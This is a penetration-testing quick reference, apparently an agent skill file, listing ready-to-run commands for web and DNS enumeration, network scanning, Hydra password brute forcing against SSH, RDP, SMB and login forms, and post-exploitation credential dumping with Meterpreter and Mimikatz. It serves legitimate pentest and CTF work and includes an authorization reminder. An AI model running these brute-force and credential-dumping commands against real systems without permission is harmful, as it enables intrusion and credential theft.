Quick Pentest Reference
Purpose
Provide rapid-access command references for common penetration testing tasks including directory busting, DNS enumeration, host discovery, service scanning, and password brute forcing. This skill serves as a quick reference for CTFs and penetration testing engagements.
Prerequisites
Required Tools
- Nmap, Gobuster, FFUF
- Hydra, Nikto
- dig, nslookup, host
- SecLists wordlists
Installation
sudo apt update
sudo apt install nmap gobuster ffuf hydra nikto dnsutils
sudo apt install seclists
Core Workflow
Phase 1: Directory Busting
Discover hidden directories and files:
Gobuster Directory Scan
# Basic directory scan
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
# With extensions
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
# With status codes
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,301,302
FFUF Directory Scan
# Basic scan
ffuf -u http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# With file extensions
ffuf -u http://10.10.10.10/FUZZ -w /usr/share/wordlists/common.txt -e .php,.txt,.html
# Filter by response size
ffuf -u http://10.10.10.10/FUZZ -w wordlist.txt -fs 4242
# Filter by status code
ffuf -u http://10.10.10.10/FUZZ -w wordlist.txt -fc 404
Phase 2: VHOST Enumeration
Discover virtual hosts and subdomains:
Gobuster VHOST Scan
gobuster vhost -u http://example.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
FFUF VHOST Scan
ffuf -u http://example.com -H "Host: FUZZ.example.com" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
# Filter false positives by size
ffuf -u http://example.com -H "Host: FUZZ.example.com" -w wordlist.txt -fs 0
Phase 3: Digital Certificate Reconnaissance
Passive subdomain discovery via certificates:
Certificate Search Engines
crt.sh Command Line
# Query crt.sh via curl
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sort -u
Phase 4: DNS Enumeration
Query DNS records for intelligence:
DNS Record Types
| Type | Purpose |
|---|---|
| A | IPv4 address |
| AAAA | IPv6 address |
| MX | Mail servers |
| NS | Name servers |
| TXT | Text records |
| CNAME | Canonical name |
| SOA | Start of authority |
Dig Commands
# A record
dig example.com A
# All records
dig example.com ANY
# MX records
dig example.com MX
# Name servers
dig example.com NS
# TXT records (SPF, DKIM)
dig example.com TXT
# Reverse lookup
dig -x 192.168.1.1
# Use specific DNS server
dig @8.8.8.8 example.com
Host Command
# Basic lookup
host example.com
# Specific record type
host -t MX example.com
host -t NS example.com
# Verbose output
host -a example.com
Nslookup
# Interactive mode
nslookup
> server 8.8.8.8
> set type=MX
> example.com
# Direct queries
nslookup example.com
nslookup -type=MX example.com
nslookup -type=NS example.com
Phase 5: Zone Transfer
Attempt DNS zone transfer for full records:
# Dig zone transfer
dig @ns1.example.com example.com AXFR
# Host zone transfer
host -l example.com ns1.example.com
# Nslookup zone transfer
nslookup
> server ns1.example.com
> ls -d example.com
Phase 6: Automated DNS Tools
DNSRecon
# Standard enumeration
dnsrecon -d example.com
# Zone transfer attempt
dnsrecon -d example.com -t axfr
# Brute force subdomains
dnsrecon -d example.com -t brt -D /usr/share/wordlists/subdomains.txt
DNSenum
# Full enumeration
dnsenum example.com
# With wordlist
dnsenum --enum example.com -f /usr/share/wordlists/subdomains.txt
Fierce
# Subdomain enumeration
fierce --domain example.com
# With wordlist
fierce --domain example.com --subdomain-file wordlist.txt
Phase 7: Host Discovery
Identify live hosts on network:
Netdiscover
# Active scan
netdiscover -i eth0
# Passive mode
netdiscover -p -i eth0
# Specific range
netdiscover -r 192.168.1.0/24
ARP Scan
# Local network
arp-scan -l
# Specific interface
arp-scan -I eth0 -l
# Specific range
arp-scan 192.168.1.0/24
Nmap Host Discovery
# Ping sweep
nmap -sn 192.168.1.0/24
# ARP ping (local network)
nmap -sn -PR 192.168.1.0/24
# ICMP echo ping
nmap -sn -PE 192.168.1.0/24
# TCP SYN ping
nmap -sn -PS 192.168.1.0/24
# UDP ping
nmap -sn -PU 192.168.1.0/24
# ICMP timestamp
nmap -sn -PP 192.168.1.0/24
# Mask ping (bypasses ICMP blocks)
nmap -sn -PM 192.168.1.0/24
Phase 8: Service and OS Discovery
Enumerate ports, services, and operating systems:
Nmap Service Scans
# SYN scan with version detection
nmap -sS -sV 192.168.1.1
# Full TCP scan with OS detection
sudo nmap -T4 -p- -A 192.168.1.1
# UDP scan
nmap -sU -T4 192.168.1.1
# Top 1000 ports
nmap -sS -sV --top-ports 1000 192.168.1.1
# All ports aggressive
nmap -sS -sV -sC -O -p- 192.168.1.1
# Banner grabbing
nmap --script=banner 192.168.1.1
# Subnet scan
nmap 192.168.1.0/24
Nikto Web Scanner
# Basic scan
nikto -h http://192.168.1.1
# With SSL
nikto -h https://192.168.1.1 -ssl
# Save output
nikto -h http://192.168.1.1 -o nikto_report.html -Format html
Phase 9: Password Brute Force
Attack authentication services:
Hydra
# SSH brute force
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# FTP brute force
hydra -L users.txt -P passwords.txt ftp://192.168.1.1
# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"
# HTTP Basic Auth
hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/
# RDP brute force
hydra -l administrator -P passwords.txt rdp://192.168.1.1
# SMB brute force
hydra -L users.txt -P passwords.txt smb://192.168.1.1
Phase 10: Post Exploitation
Actions after gaining access:
Windows Credential Dumping
# Meterpreter
meterpreter> hashdump
meterpreter> getsystem
meterpreter> load kiwi
meterpreter> creds_all
# Mimikatz
mimikatz# sekurlsa::logonpasswords
mimikatz# lsadump::sam
Linux Privilege Escalation
# Check sudo permissions
sudo -l
# Find SUID binaries
find / -perm -4000 2>/dev/null
# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*
# LinPEAS enumeration
./linpeas.sh
Quick Reference
Essential Wordlists
| Path | Purpose |
|---|---|
/usr/share/wordlists/dirb/common.txt | Common directories |
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | Medium directory list |
/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt | Subdomains |
/usr/share/wordlists/rockyou.txt | Passwords |
Command Quick Reference
| Task | Command |
|---|---|
| Directory bust | gobuster dir -u URL -w wordlist |
| VHOST enum | ffuf -H "Host: FUZZ.domain" -u URL -w wordlist |
| DNS lookup | dig domain.com ANY |
| Zone transfer | dig @ns.domain.com domain.com AXFR |
| Host discovery | nmap -sn 192.168.1.0/24 |
| Port scan | nmap -sS -sV -p- target |
| Brute force | hydra -l user -P list service://target |
Constraints and Limitations
Authorization
- Only test systems you own or have permission to test
- Document all testing activities
- Stay within scope
Tool Limitations
- Some scans may trigger IDS/IPS
- Rate limiting may block aggressive scans
- Firewalls may block certain techniques
Troubleshooting
Scans Returning No Results
Solutions:
- Verify target is reachable
- Try different scanning techniques
- Check for firewall blocks
- Use slower scan rates